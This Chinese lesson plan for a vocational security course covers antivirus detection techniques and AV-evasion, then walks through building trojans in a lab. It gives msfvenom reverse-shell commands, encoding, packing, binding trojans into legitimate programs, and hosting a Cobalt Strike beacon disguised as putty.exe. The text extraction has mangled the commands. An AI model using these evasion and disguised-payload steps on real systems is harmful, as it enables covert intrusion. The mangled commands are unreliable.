網(wǎng)絡(luò)安全技術(shù)實踐教程（微課版）-教案 病毒與木馬的認知與防護

《網(wǎng)絡(luò)安全技術(shù)實踐教程》教案授課單位：授課時間：授課班級：授課教師：年月日教案8（第8號/17號）課程名稱網(wǎng)絡(luò)安全授課日期、節(jié)次班級課堂類型理論+實踐地點章節(jié)（任務(wù)）名稱任務(wù)4.1病毒免殺任務(wù)4.2木馬教學目標知識目標1.理解病毒、木馬等惡意軟件的基本概念及其對信息系統(tǒng)的危害。2.掌握常見的病毒查殺技術(shù)原理，包括文件掃描、內(nèi)存掃描、行為監(jiān)控和云端查殺等方法。3.熟悉不同病毒掃描技術(shù)（如字符串掃描、通配符掃描、智能掃描、骨架掃描等）的具體應(yīng)用場景及其優(yōu)缺點。能力目標1.能夠根據(jù)不同病毒特征選擇合適的查殺技術(shù)并進行有效檢測與防護。2.能分析常見病毒免殺手段，并提出針對性的防護與應(yīng)對措施。3.能在實際工作中部署、配置并優(yōu)化殺毒軟件，定期更新病毒庫，提升系統(tǒng)安全防護能力。4.能夠生成并部署木馬程序，模擬真實攻擊環(huán)境。素質(zhì)目標1.樹立主動防御意識，認識到持續(xù)監(jiān)測和病毒防護在信息安全中的重要性。2.培養(yǎng)細致嚴謹?shù)墓ぷ鲬B(tài)度，能在日常運維中堅持執(zhí)行病毒查殺與防護規(guī)范。學情分析授課對象：計算機網(wǎng)絡(luò)技術(shù)專業(yè)學生，包括中職與普高混合班。學生特點：計算機網(wǎng)絡(luò)技術(shù)專業(yè)學生，基礎(chǔ)知識存在差異，需針對性講解與實踐操作結(jié)合。學習習慣：偏愛實踐性強的課程，理論學習興趣較低。樂于通過案例和互動式教學理解知識點。重難點分析教學重點1.病毒查殺技術(shù)的基本原理，包括文件掃描、內(nèi)存掃描、行為監(jiān)控和云端查殺的具體過程。2.常見病毒掃描技術(shù)（字符串掃描、通配符掃描、智能掃描、骨架掃描等）的工作機制及應(yīng)用。3.CobaltStrike監(jiān)聽器配置與木馬生成過程教學難點1.病毒免殺技術(shù)的實現(xiàn)原理（如殼技術(shù)、加密、混淆、特征隱藏等），及其對傳統(tǒng)查殺手段的挑戰(zhàn)。2.查殺技術(shù)中智能掃描與骨架掃描方法的深入理解及實際應(yīng)用分析。3.病毒行為監(jiān)控與傳統(tǒng)特征碼掃描之間的關(guān)系與互補性分析。信息化應(yīng)用方法通過課件、視頻、案例分析、互動提問等多種信息化方式，借助學習通平臺發(fā)布學習資源和任務(wù)，學生自主學習并完成任務(wù)。課程思政元素1.網(wǎng)絡(luò)安全事關(guān)國家安全，培養(yǎng)學生的家國情懷與責任感。2.樹立服務(wù)意識，塑造職業(yè)精神，使學生形成運用所學專業(yè)知識為社會貢獻的責任感。3.鍛煉學生實事求是的工作態(tài)度，培養(yǎng)學生嚴謹細致的工作作風、精益求精的工匠精神。教學實施過程課前：平臺發(fā)布病毒與木馬的認知與防護任務(wù)1學習任務(wù)，學生預(yù)習。課中：導(dǎo)入新課某公司突然發(fā)現(xiàn)其內(nèi)部網(wǎng)絡(luò)頻繁出現(xiàn)異常，數(shù)據(jù)傳輸速率異常緩慢，部分敏感文件似乎遭到未授權(quán)訪問。眾智科技接到該公司委托后立即成立專項應(yīng)急小組，對相關(guān)流量進行分析，初步懷疑，這些情況可能由一種新型病毒所導(dǎo)致。該病毒以隱藏自身蹤跡見長，能夠悄無聲息地在企業(yè)網(wǎng)絡(luò)中橫向擴散，竊取重要信息，并可能對關(guān)鍵系統(tǒng)構(gòu)成威脅。經(jīng)過專項應(yīng)急小組緊急處理后，公司的網(wǎng)絡(luò)恢復(fù)了正常。眾智科技深知病毒木馬可能對客戶信息系統(tǒng)帶來嚴重威脅，通過為客戶網(wǎng)絡(luò)維護部門講解和演示病毒免殺，使客戶網(wǎng)絡(luò)維護部門了解了病毒如何逃避殺毒軟件的查殺。因此，在接下來的日常系統(tǒng)安全管理過程中，殺毒軟件的安裝及定期升級病毒庫成為客戶網(wǎng)絡(luò)維護部門日常信息安全維護的必要工作之一。任務(wù)一知識點講解一.病毒查殺方式及原理從計算機科學角度來看，病毒是一種惡意軟件，它能在未經(jīng)授權(quán)的情況下傳播、感染計算機系統(tǒng)，并對系統(tǒng)功能進行破壞，竊取數(shù)據(jù)，或者進行其他非法操作。病毒查殺是指通過殺毒軟件或其他安全工具檢測、識別并清除計算機系統(tǒng)中的病毒、木馬及其他惡意軟件的過程。這一過程通?；谝韵聨追N技術(shù)。1．基于文件掃描的反病毒技術(shù)（1）第一代掃描技術(shù)第一代掃描技術(shù)的核心是在文件中檢索病毒特征序列。該技術(shù)雖然出現(xiàn)得比較早，但是直到現(xiàn)在仍然被多家殺毒廠商所使用，其主要代表為“字符串掃描技術(shù)”和“通配符掃描技術(shù)”。字符串掃描技術(shù)：使用從病毒中提取出來的具有一定特征的一段字符（特征碼）來檢測病毒，該段字符在一般程序中不太可能出現(xiàn)。例如，一個隱藏執(zhí)行格式化所有硬盤的命令不太可能出現(xiàn)在一般程序中，可以將其作為特征碼。通配符掃描技術(shù)：由于字符串掃描技術(shù)有執(zhí)行速度與特征碼長度的限制，所以正在逐漸被通配符掃描技術(shù)取代。當前反病毒軟件中的簡單掃描器通常支持通配符。掃描器中的通配符一般用于跳過某些字節(jié)或字節(jié)范圍，而隨著技術(shù)的發(fā)展，現(xiàn)在大多數(shù)掃描器已經(jīng)支持正則表達式。（2）第二代掃描技術(shù)第二代掃描技術(shù)以“近似精確識別法”和“精確識別法”為代表，除此之外還有“智能掃描法”與“骨架掃描法”，第二代掃描技術(shù)與第一代掃描技術(shù)相比，對檢測精度提出了更嚴格的要求。（1）近似精確識別法：采用兩個或更多的字符集來檢測每個病毒，如果掃描器檢測到其中一個特征符合，就會警告發(fā)現(xiàn)病毒變種，但不會針對病毒執(zhí)行下一步操作。如果多個特征碼全部符合，則會報警發(fā)現(xiàn)病毒并執(zhí)行下一步操作。（2）精確識別法：作為最嚴格的識別方法之一，精確識別法確保了對病毒變種的精準匹配。它不僅基于傳統(tǒng)的校驗和，還可能整合了更復(fù)雜的算法，如全病毒體校驗和生成特征圖。這種方法要求對病毒的每一個字節(jié)都進行精確匹配，盡管這可能導(dǎo)致更高的計算成本，但它提供了較高級別的檢測確定性，常與其他掃描技術(shù)結(jié)合使用，以達到最佳防護效果。（3）智能掃描法：忽略檢測文件中類似NOP等無意義的指令，而對于文本格式的腳本病毒和宏病毒，則可以替換多余的格式字符，如空格符、換行符或制表符等。所有的替換動作均在掃描緩沖區(qū)中執(zhí)行，大大提高了掃描器的檢測能力。（4）骨架掃描法：由卡巴斯基公司發(fā)明，在檢測宏病毒時效果特別顯著。該方法沒有使用特征碼和校驗和，而是逐行解析宏語句，丟棄所有非必要字符，只保留代碼的骨架，并對代碼骨架進行進一步的分析，在一定程度上提高了對病毒變種的檢測能力。2．基于內(nèi)存掃描的反病毒技術(shù)內(nèi)存掃描器通常與實時監(jiān)控系統(tǒng)緊密集成，協(xié)同工作，以提供實時保護。它們能夠在病毒或惡意軟件執(zhí)行前或執(zhí)行過程中及時發(fā)現(xiàn)并阻止?jié)撛谕{。由于程序加載到內(nèi)存中后，其結(jié)構(gòu)和磁盤上的原始文件結(jié)構(gòu)相比可能會發(fā)生變化，包括代碼重定位、動態(tài)鏈接庫的加載、數(shù)據(jù)段的初始化等，這些變化要求內(nèi)存掃描器采用不同的策略。這意味著內(nèi)存掃描使用的特征碼往往與文件掃描的不同，需要針對內(nèi)存中代碼的特性定制開發(fā)，以便更有效地識別已加載或正在執(zhí)行的惡意代碼。內(nèi)存掃描的一個重要優(yōu)勢在于其能夠即時響應(yīng)。當病毒或惡意軟件嘗試在內(nèi)存中初始化、修改系統(tǒng)設(shè)置、注入其他進程或執(zhí)行其他惡意行為時，內(nèi)存掃描器能夠迅速捕獲這些活動，及時阻止惡意代碼的進一步執(zhí)行，從而降低系統(tǒng)被侵害的風險。與靜態(tài)文件掃描相比，內(nèi)存掃描更側(cè)重于動態(tài)分析，即在代碼執(zhí)行過程中分析其行為。這種分析能夠揭示更多關(guān)于惡意軟件意圖的信息，比如網(wǎng)絡(luò)連接請求、系統(tǒng)資源的異常訪問模式等，這些都是文件掃描難以直接捕獲的。3．基于行為監(jiān)控的反病毒技術(shù)此類反病毒技術(shù)一般需要和虛擬機與主動防御等技術(shù)配合使用。其核心原理是在受控的虛擬環(huán)境中動態(tài)執(zhí)行可疑代碼，同時運用復(fù)雜的算法模型分析程序行為序列，并將其與龐大數(shù)據(jù)庫中的已知惡意行為模式進行比對。4．基于新興技術(shù)的反病毒技術(shù)（1）云端查殺技術(shù)：云端查殺實踐了“集體智慧，協(xié)同防御”的原則，代表了反病毒領(lǐng)域的一大突破。該技術(shù)依托于強大的服務(wù)器中樞與廣泛分布的用戶終端所形成的網(wǎng)絡(luò)，使服務(wù)器能實時監(jiān)測各用戶的狀態(tài)。一旦檢測到個體異常，其能迅速部署檢查并隔離問題，有效阻止威脅擴散。此過程依賴于用戶群體的行為模式作為基線，例如，若多數(shù)設(shè)備已安全運行某軟件，則新設(shè)備運行該軟件亦被視為安全。反之，則觸發(fā)警報并介入防護。（2）信任鏈繼承機制：構(gòu)建于云端的復(fù)雜信任架構(gòu)，融合用戶反饋、專家分析、自動化評估及數(shù)字簽名驗證等多維度信任體系。其核心是“根可信進程”，根可信進程作為信任鏈的起源點，確保其衍生的子進程均被賦予信任。例如，經(jīng)數(shù)字簽名驗證的進程A執(zhí)行時無阻，其衍生的子進程亦自動獲得信任；而未經(jīng)驗證的進程B，則面臨嚴格監(jiān)控，其有任何可疑行為都將立即上報分析，從而持續(xù)拓展云端信任網(wǎng)絡(luò)的深度與廣度。（3）分布式防御協(xié)作：利用云計算與病毒傳播的分布式特性，實現(xiàn)對病毒事件的快速響應(yīng)。每一起新病毒事件，都能迅速被上傳至云端，經(jīng)分析處理后，全網(wǎng)范圍內(nèi)的設(shè)備即時獲得防護升級，大大提升了對新威脅的捕捉效率和覆蓋面。（4）多引擎聯(lián)合查殺：該技術(shù)通過同時調(diào)用兩個或更多反病毒引擎進行掃描，顯著提升檢測精度。反病毒解決方案通常允許用戶靈活選擇掃描模式，針對不同引擎采取策略，這要求免殺技術(shù)需針對每個引擎特性逐一突破，增加了惡意軟件逃避檢測的難度。二、病毒免殺技術(shù)免殺技術(shù)是惡意軟件開發(fā)者用來逃避查殺機制的一系列策略和技術(shù)，從而確保其惡意代碼能夠在受保護的系統(tǒng)中運行而不被發(fā)現(xiàn)或阻止，常見的免殺技術(shù)如下。1．修改特征碼所謂特征碼，就是指防毒軟件從病毒樣本中提取的長度不超過64字節(jié)且能代表病毒特征的十六進制代碼，主要有單一特征碼、多重特征碼和復(fù)合特征碼這3種類型。殺毒軟件在工作時，使用了檢測病毒特征碼的概念，那么惡意軟件開發(fā)者可以通過修改病毒特征碼的方式躲過殺毒軟件的掃描。2．花指令免殺花指令免殺是指通過插入無意義或具有混淆性質(zhì)的代碼片段，即“花指令”，來干擾反匯編過程和反病毒軟件的靜態(tài)分析，從而達到隱藏惡意代碼真實邏輯的目的。其主要思想是通過在程序入口點或關(guān)鍵代碼段前插入看似無關(guān)緊要的指令序列，使得反匯編工具難以直接揭示程序的真實功能，從而增加分析難度。其具體實現(xiàn)包括利用jmp、call和ret等指令改變程序的執(zhí)行流程，使程序的實際起始點或重要邏輯分支不易被追蹤，通過復(fù)雜的堆棧指令，如壓棧、彈棧指令，進一步擾亂代碼的邏輯路徑，使分析人員難以通過直觀的反匯編代碼理解程序行為；使用計算和條件轉(zhuǎn)移指令對關(guān)鍵地址或數(shù)據(jù)進行間接引用，使關(guān)鍵代碼的位置和用途更加隱蔽。3．加殼免殺加殼的本質(zhì)是在外部包裹一層代碼，以此來改變軟件的原始面貌，實現(xiàn)對軟件的保護、壓縮或加密。殼就是軟件所增加的保護，其并不會破壞軟件內(nèi)部結(jié)構(gòu)。當運行這個加殼的程序時，系統(tǒng)首先會運行程序里的殼，然后由殼將加密的程序逐步還原到內(nèi)存中，最后運行程序。加殼雖然對于特征碼繞過有非常好的效果，基本上可以把特征碼全部掩蓋，但是其缺點也非常明顯，由于殼本身也具有一定的特征，某些反病毒軟件能夠直接識別出常見的殼類型，從而觸發(fā)警報。一些專業(yè)的逆向工程師或高級的反病毒軟件能夠識別并移除加殼程序的外殼，暴露出其原始代碼。4．內(nèi)存免殺內(nèi)存免殺將惡意代碼（如病毒、木馬等）直接加載到內(nèi)存中，而不將其寫入磁盤上的文件中，從而繞過傳統(tǒng)的基于文件的殺毒軟件檢測。惡意軟件常常利用系統(tǒng)漏洞或合法進程，通過動態(tài)庫注入、遠程線程創(chuàng)建等手段，將惡意代碼片段插入正在運行的合法應(yīng)用程序中執(zhí)行。在某些高級策略中，惡意軟件能夠在運行時動態(tài)修改自身的代碼結(jié)構(gòu)，采用代碼變形、多態(tài)性技術(shù)等，使得其內(nèi)存中的表示形式隨每次執(zhí)行而變化，這種動態(tài)性會讓基于靜態(tài)特征碼的檢測工具失效。5．二次編譯二次編譯主要用于修改惡意軟件的源代碼，使其在經(jīng)過編譯后能夠躲避殺毒軟件的檢測。這種技術(shù)通常涉及對源代碼進行反匯編、逆向工程和系統(tǒng)漏洞利用等高級黑客技術(shù)。攻擊者獲取惡意軟件的源代碼后，對其進行修改，改變其特征或行為模式。經(jīng)過修改的源代碼需要被重新編譯成可執(zhí)行文件。編譯完成后，攻擊者會使用多種殺毒軟件對生成的可執(zhí)行文件進行掃描測試，以驗證其是否成功躲避了殺毒軟件的檢測。任務(wù)一實施步驟1.msf自捆綁加編碼（1）在Metasploit框架下實現(xiàn)免殺的方式之一是使用msf編碼器，即使用msf編碼器對制作的木馬進行重新編碼，生成一個二進制文件，這個文件運行后，msf編碼器會將原始程序解碼到內(nèi)存中并執(zhí)行。在Kali終端輸入并執(zhí)行“msfvenom-lencoders”，可以列出所有可用的編碼方式，如圖4-1所示。圖4-1列出所有可用的編碼方式（2）使用msfvenom生成一個Windows環(huán)境下的木馬，并將其捆綁到wegame.exe（可以選擇任意.exe程序）上，生成名為wegame01.exe的合成馬。同時，對木馬進行多次x86/shikata_ga_nai編碼以實現(xiàn)免殺處理。代碼如下。msfvenom-pwindows/meterpreter/reverse_tcplhost=28lport=4444

-ex86/shikata_ga_nai-x/var/tmp/wegame.exe-i12-fexe-o/var/tmp/wegame01.exe注意：在-e選項后可嘗試使用其他編碼方式。選項說明如下。-p：攻擊載荷，用戶載入后滲透模塊Meterpreter反彈Shell。lhost：攻擊機IP地址。lport：攻擊機監(jiān)聽端口。-e：指定需要使用的編碼器。-x：指定一個自定義的可執(zhí)行文件作為模板。-i：指定編碼次數(shù)。-f：指定輸出格式。-o：輸入payload。（3）使用指定方式進行監(jiān)聽，輸入代碼如下，效果如圖4-2所示。useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost28setlport4444run圖4-2使用指定方式進行監(jiān)聽（4）通過復(fù)制等方式將wegame01.exe文件放入靶機測試即可。圖4-3所示為運行木馬之后的木馬上線效果。圖4-3木馬上線效果2．添加花指令（1）加花是病毒免殺的常用手段，加花以后，一些殺毒軟件就檢測不出病毒了，但是有些功能比較強的殺毒軟件還是能檢測出病毒的。這可以算是免殺技術(shù)中最初級的階段。使用msf編碼器生成常規(guī)木馬，如圖4-4所示。msfvenom-pwindows/shell_reverse_tcp-ax86--platformwindows

lhost=28lport=4444-fexe-o/var/tmp/abc.exe圖4-4生成常規(guī)木馬（1）使用牧馬游民工具對生成的abc.exe木馬進行加花處理，將剛剛生成的木馬拖進程序界面內(nèi)，選擇“花指令”，最后單擊“加花”按鈕即可對abc.exe添加花指令，如圖4-5所示。圖4-5添加花指令3．UPX加殼（1）軟件加殼也可以稱為軟件加密（或軟件壓縮），只是加密（或壓縮）的方式與正常加密的目的不一樣。這里我們繼續(xù)使用前面步驟中msf編碼器生成的常規(guī)木馬。（2）使用UPXShell進行加殼處理。將需要加殼的木馬添加進軟件后，單擊“壓縮”選項卡中的“執(zhí)行！”按鈕，即可對木馬程序進行加殼處理，如圖4-6所示。圖4-6UPX加殼4．文件捆綁（1）使用文件捆綁工具進行捆綁（文件1為之前生成的木馬程序，文件2為正常程序），如圖4-7所示。（2）完成上一步操作后，打開“捆綁文件”選項卡，單擊“執(zhí)行”按鈕就可以將之前生成的木馬程序與正常程序進行捆綁，生成惡意程序，如圖4-8所示。將生成的惡意程序發(fā)送到靶機運行，即可看到靶機被控制。圖4-7文件捆綁圖4-8生成惡意程序5．Golang編譯捆綁（1）在Golang環(huán)境中安裝該程序go1.21.6.windows-amd64.msi，軟件如圖4-9所示。圖4-9Golang安裝程序（2）軟件安裝完成后，需要配置環(huán)境變量。右擊“我的電腦”，在彈出的快捷菜單中選擇“屬性”，在打開的窗口中單擊“高級系統(tǒng)設(shè)置”，在彈出的“系統(tǒng)屬性”對話框中單擊“環(huán)境變量”，在彈出的“環(huán)境變量”對話框的“系統(tǒng)變量”欄中雙擊“Path”變量，并在彈出的對話框中增加一條Golang的安裝位置信息，如圖4-10所示。圖4-10配置環(huán)境變量（3）配置完成后需要測試環(huán)境變量是否配置成功，在“命令提示符”窗口中執(zhí)行“goversion”查看軟件版本，如圖4-11所示。圖4-11測試環(huán)境變量是否配置成功（4）使用Golang編譯捆綁程序源代碼，生成“GoFileBinder.exe”。在“命令提示符”窗口中進入放置源代碼文件的文件夾，使用“gobuildGoFileBinder.go”命令生成GoFileBinder.exe，如圖4-12所示。圖4-12生成GoFileBinder.exe（5）使用GoFileBinder.exe程序進行文件捆綁。注意在此例中“abc.exe”為木馬程序，“putty.exe”為正常程序。在輸入并執(zhí)行GoFileBinder.exeabc.exeputty.exe命令后，在當前文件夾中會生成“Yihsiwei.bat”這個批處理文件，如圖

4-13所示。圖4-13生成Yihsiwei.bat批處理文件（6）雙擊Yihsiwei.bat批處理文件，批處理會自動生成捆綁后的木馬程序“Yihsiwei.exe”，如圖4-14所示。圖4-14生成捆綁木馬程序（7）接下來依舊使用msf編碼器中的監(jiān)聽模塊以及對應(yīng)的payload完成上線。將Yihsiwei.exe文件放入靶機運行。圖4-15所示為運行木馬之后的木馬上線效果。圖4-15通過Golang編譯捆綁木馬上線效果任務(wù)2知識點講解一.木馬簡介1．木馬的定義木馬（TrojanHorse），也稱木馬病毒，是指通過特定的程序來控制另一臺計算機系統(tǒng)。“TrojanHorse”一詞源自古希臘傳說。在這個傳說中，希臘軍隊圍攻特洛伊城多年未果，于是設(shè)計了一個巨大的木馬雕像，假裝撤退并將木馬雕像遺棄在特洛伊城門外。特洛伊人將木馬雕像視為戰(zhàn)利品帶入城內(nèi)，卻不知其中藏有希臘士兵。夜幕降臨時，藏匿的希臘士兵悄悄打開城門，城外伏兵涌入，導(dǎo)致特洛伊城淪陷。因此，“TrojanHorse”（或簡稱“Trojan”）后來成為隱秘入侵或內(nèi)部破壞的代名詞，在現(xiàn)代尤其指代那些表面看似無害但實際上含有惡意代碼的計算機程序，即“木馬”。木馬與一般的病毒不同，它不會自我繁殖，也不會“刻意”地去感染其他文件，它通過偽裝自身來吸引用戶下載并執(zhí)行，向施種者提供打開被種主機的門戶，使施種者可以任意毀壞、竊取被種主機的文件，甚至遠程操控被種主機。2．木馬的運行原理木馬是一種典型的C/S模式軟件，分為客戶端和服務(wù)器端。一般情況下，黑客需要將服務(wù)器端程序安裝到目標主機上，在自己的計算機上運行客戶端程序。如果黑客能夠通過木馬成功地控制目標主機，就能在自己的計算機與目標主機之間建立起一個TCP連接。按照連接建立方式的不同，木馬主要分為兩種類型：正向連接木馬和反彈連接木馬。正向連接木馬的特點是目標主機上固定開放某個端口，然后由黑客主動連接目標主機。反彈連接木馬則是在黑客的計算機上固定開放某個端口，然后由目標主機主動連接黑客的計算機。早期的木馬主要為正向連接木馬，這種木馬的最大缺點是：黑客要想連接目標主機，必須先知道其IP地址。對于目前采用撥號上網(wǎng)的終端，IP屬于動態(tài)IP。每次撥號后，終端IP都會更換用戶每次撥號后IP地址都會更換，這樣就算被黑客種了木馬，在目標主機下次撥號的時候，黑客也會因找不到IP而丟失目標主機。此外，對于目前廣泛采用的另外一種上網(wǎng)方式，即局域網(wǎng)通過NAT（NetworkAddressTranslation，網(wǎng)絡(luò)地址轉(zhuǎn)換）接入互聯(lián)網(wǎng)來說，那些處于內(nèi)網(wǎng)的機器由于采用了私有IP地址，因而外界是無法直接訪問它們的（即使被種了木馬也沒用），除非黑客與目標主機處于同一個局域網(wǎng)中，否則無法現(xiàn)其建立連接。由于正向連接木馬存在一系列缺點，所以就產(chǎn)生了反彈連接木馬，灰鴿子正是反彈連接木馬的始祖。反彈連接木馬通過在黑客的計算機上開啟固定端口，然后由目標主機主動連接黑客的計算機，克服了正向連接木馬的一系列缺點，無論目標主機的IP地址如何變換，目標主機都可以主動連接到黑客的計算機。即使目標主機處于內(nèi)網(wǎng)，由于內(nèi)網(wǎng)的機器是可以主動訪問外網(wǎng)的，所以目標主機也可以連接到黑客的計算機。反彈連接木馬的不足在于要求黑客必須有固定的IP地址，否則目標主機將無法找到黑客的計算機。解決這個問題的方法之一是采用動態(tài)域名技術(shù)，即黑客注冊一個域名，然后將域名對應(yīng)到自己的IP地址上，這樣，無論黑客的IP地址如何變換，目標主機都可以通過動態(tài)域名主動連接到黑客的計算機。除了要解決動態(tài)IP地址的問題以外，反彈連接木馬還有一個要解決的難題，即如果黑客的計算機處于內(nèi)網(wǎng)，那么目標主機仍然是無法主動連接它的，這還要求處于內(nèi)網(wǎng)的黑客的計算機必須在內(nèi)網(wǎng)的出口路由器上做端口映射。雖然反彈連接木馬配置起來相對比較麻煩，但是由于其技術(shù)“相對先進”目前的木馬絕大多數(shù)都是反彈連接木馬。二、木馬的常見類型1．遠程訪問型木馬遠程控制是現(xiàn)代木馬的基本功能，木馬會設(shè)法與用戶計算機建立連接，隨后通過遠程下發(fā)命令來實現(xiàn)遠程抓取、文件傳輸、屏幕截取等功能。典型代表有灰鴿子、冰河等。2．盜取密碼型木馬這類木馬以找到所有的隱藏密碼為目標，如各種社交賬號和密碼、網(wǎng)絡(luò)游戲中的游戲密碼，并在受害者不知情的情況下將密碼信息發(fā)送出去。典型代表有Wirenet等。3．記錄鍵值型木馬記錄鍵值型木馬顧名思義就是記錄用戶每一次敲擊鍵盤操作的木馬。這類木馬會隨著操作系統(tǒng)的啟動而自動加載，分為在線和離線兩種類型，分別記錄用戶在在線和離線兩種狀態(tài)下敲擊鍵盤的信息。記錄鍵值型木馬一般也具有郵件發(fā)送功能，能通過郵件將記錄的信息發(fā)送給控制者。典型代表有MagicLantern、鍵盤記錄器木馬變種EOM等。4．DDoS攻擊型木馬攻擊者通過木馬程序控制被感染的主機，這些被感染的主機稱為“目標主機”。攻擊者通過控制大量目標主機發(fā)起DDoS（DistributedDenialofService，分布式拒絕服務(wù)）攻擊。例如，當攻擊者針對某個網(wǎng)站發(fā)起DDoS攻擊時，會導(dǎo)致該網(wǎng)站的服務(wù)器資源被大量占用，無法正常為用戶提供服務(wù)。典型代表有SatanDDoS僵尸網(wǎng)絡(luò)木馬、魔鼬等。5．網(wǎng)銀木馬網(wǎng)銀木馬主要針對銀行的網(wǎng)上交易系統(tǒng)，該木馬旨在竊取用戶的銀行賬戶信息，包括銀行賬號和密碼信息，給個人財產(chǎn)安全帶來很大的危害。典型代表有TinyBanker、木馬銀行家等。CobaltStrike滲透工具CobaltStrike，這一在滲透測試領(lǐng)域內(nèi)的專業(yè)工具，憑借其卓越的功能與靈活性，已經(jīng)從原先依賴于MetasploitFramework的框架中獨立出來，發(fā)展為一個全面且獨立的操作平臺。它革命性地采用了C/S架構(gòu)設(shè)計，其中服務(wù)器端扮演著核心角色，充當指揮中樞，負責管理和協(xié)調(diào)各種滲透任務(wù)，而客戶端則更加靈活多變，允許安全團隊部署多個客戶端實例，以便團隊成員能夠在不同地點進行協(xié)同作業(yè)，實現(xiàn)真正的分布式滲透測試和紅隊演練。CobaltStrike有以下功能特性。（1）端口轉(zhuǎn)發(fā)與代理：允許攻擊者通過受控主機在內(nèi)網(wǎng)中進行端口轉(zhuǎn)發(fā)，建立隧道穿透網(wǎng)絡(luò)隔離，便于后續(xù)的攻擊操作。（2）病毒與木馬生成：能夠生成多種類型的惡意載荷，包括Windows可執(zhí)行文件、動態(tài)鏈接庫、宏病毒文檔、JavaApplet等，用于釣魚攻擊或利用系統(tǒng)漏洞進行植入。（3）漏洞利用：集成了一些已知漏洞的利用模塊，幫助攻擊者快速利用目標系統(tǒng)的安全弱點。（4）憑據(jù)收集：能夠收集目標網(wǎng)絡(luò)中的用戶名和密碼，利用明文憑據(jù)、哈希傳遞或憑證盜取技術(shù)進一步滲透網(wǎng)絡(luò)。（5）橫向移動：提供了多種技術(shù)，如哈希傳遞等，在內(nèi)網(wǎng)中橫向擴散，控制更多的系統(tǒng)。任務(wù)二實施步驟（1）下載CobaltStrike安裝包，并將CobaltStrike安裝包上傳到Kali中。我們進入CobaltStrike相應(yīng)的文件夾中，在終端輸入“./teamserver31admin”并執(zhí)行，運行CobaltStrike服務(wù)器端軟件，如圖4-16所示。圖4-16運行CobaltStrike服務(wù)器端軟件（2）下面需要運行CobaltStrike客戶端軟件，CobaltStrike客戶端在Windows和Linux下都可以使用（注意運行前安裝Java并配置相應(yīng)的環(huán)境變量）。此次在Kali中運行客戶端，依然是在CobaltStrike相應(yīng)的文件夾中使用解壓后的文件夾，在終端輸入“./cobaltstrike”并執(zhí)行，啟動客戶端，如圖4-17所示。圖4-17執(zhí)行命令啟動客戶端（3）Strike服務(wù)器端的IP地址，本例中為“31”。在“密碼”文本框中填入剛剛在服務(wù)器端中設(shè)置的密碼，本例密碼為“admin”，如圖4-18所示。圖4-18設(shè)置CobaltStrike客戶端（4）設(shè)置完成后單擊“連接”按鈕就可以登錄CobaltStrike客戶端界面。顯示結(jié)果如圖4-19所示。圖4-19CobaltStrike客戶端界面（5）接下來需要創(chuàng)建監(jiān)聽器用于監(jiān)聽反饋。首先單擊“CobaltStrike”→“監(jiān)聽器”，如圖4-20所示。圖4-20創(chuàng)建監(jiān)聽器（6）通過上一步操作，我們打開了“監(jiān)聽器”選項卡，接下來單擊“添加”按鈕進行下一步設(shè)置，如圖4-21所示。圖4-21在“監(jiān)聽器”選項卡中添加配置（7）在彈出的“新建監(jiān)聽器”窗口中進行配置。在“名字”文本框中設(shè)置一個新名稱，本例為“TEST”。在“Payload選項”的“HTTP地址”文本框使用“”鍵將服務(wù)器地址添加進去，如圖4-22所示。完成后單擊“保存”按鈕進行配置保存。圖4-22配置監(jiān)聽器（8）配置并生成Windows遠程木馬。在主界面單擊“攻擊”→“生成后門”→“Windows可執(zhí)行程序”，如圖4-23所示，完成后進入配置界面。圖4-23進入Windows可執(zhí)行程序配置界面（9）在打開的Windows可執(zhí)行程序配置界面中的“監(jiān)聽器”選擇框中選擇剛剛配置好的監(jiān)聽器。本例中為“TEST”，如圖4-24所示。圖4-24配置木馬監(jiān)聽器（10）選擇監(jiān)聽器后，就可以單擊“生成”按鈕進行Windows木馬生成，如圖4-25所示。圖4-25生成Windows木馬（11）生成木馬后，軟件會在界面中彈出木馬保存位置及名稱的提醒，如圖4-26所示。圖4-26木馬保存位置及名稱（12）圖4-27文件托管（13）在彈出的“文件托管”對話框中選擇剛剛生成的木馬的文件位置，將本地URI（UniformResourceIdentifier，統(tǒng)一資源標識符）改為想要偽裝的程序名稱，本例為“/putty.exe”，如圖4-28所示。完成后單擊“運行”按鈕。圖4-28配置文件托管（14）操作完成后CobaltStrike會彈出配置好的URL以供復(fù)制使用，如圖4-29所示。圖4-29生成的URL（15）下面需要使用各種方式讓靶機單擊生成好的URL，下載偽裝好的木馬并讓靶機運行，如圖4-30所示。圖4-30靶機下載并運行偽裝好的木馬程序（16）等待片刻就可以在CobaltStrike中看到靶機上線的信息，如圖4-31所示。圖4-31看到靶機上線的信息（17）選擇被控靶機并右擊，如圖4-32所示，在彈出的快捷菜單中選擇“會話交互”。圖4-32選擇靶機的會話交互（18）使用shell命令進行進一步滲透活動，例如，輸入“shellipconfig”命令并執(zhí)行，獲取靶機IP地址，如圖4-33所示。圖4-33執(zhí)行命令獲取靶機IP地址課后：1.任務(wù)鞏固2.教師答疑3.布置預(yù)習任務(wù)作業(yè)布置使用殺毒軟件查殺msfvenom生成的Windows木馬程序，觀察殺毒軟件能否查殺該木馬，如果該木馬被殺毒軟件查殺，我們可以嘗試使用msfvenom的-e選項選擇其他編碼方式生成新的木馬進行免殺測試。同時，我們可以繼續(xù)嘗試將新生成的木馬程序通過添加花指令和UPX加殼后進行進一步測試。教學反思通過本節(jié)內(nèi)容講解，學生學習興趣很高，但實際案例分析和動手實驗部分需要進一步加強，以提升理解的深度和實戰(zhàn)應(yīng)用能力?！毒W(wǎng)絡(luò)安全技術(shù)實踐教程》教案授課單位：授課時間：授課班級：授課教師：年月日教案9（第9號/17號）課程名稱網(wǎng)絡(luò)安全授課日期、節(jié)次班級課堂類型理論+實踐地點章節(jié)（任務(wù)）名稱任務(wù)4.3木馬檢測教學目標知識目標1.了解木馬程序的常見隱藏方式（進程、文件、注冊表等）。2.掌握木馬的典型啟動方式及其對應(yīng)系統(tǒng)機制。3.識別主流木馬檢測技術(shù)的原理與應(yīng)用場景。能力目標1.能夠使用火絨劍對可疑進程和未知文件進行監(jiān)控與分析。2.能夠使用D盾和Webshell本地掃描器查殺Webshell并識別風險文件。3.能夠根據(jù)行為特征判斷可疑程序是否為木馬。素質(zhì)目標1.培養(yǎng)嚴謹細致的安全排查習慣。2.增強對系統(tǒng)安全威脅的敏感性與責任感。3.樹立主動防御和持續(xù)監(jiān)控的信息安全意識。學情分析授課對象：計算機網(wǎng)絡(luò)技術(shù)專業(yè)學生，包括中職與普高混合班。學生特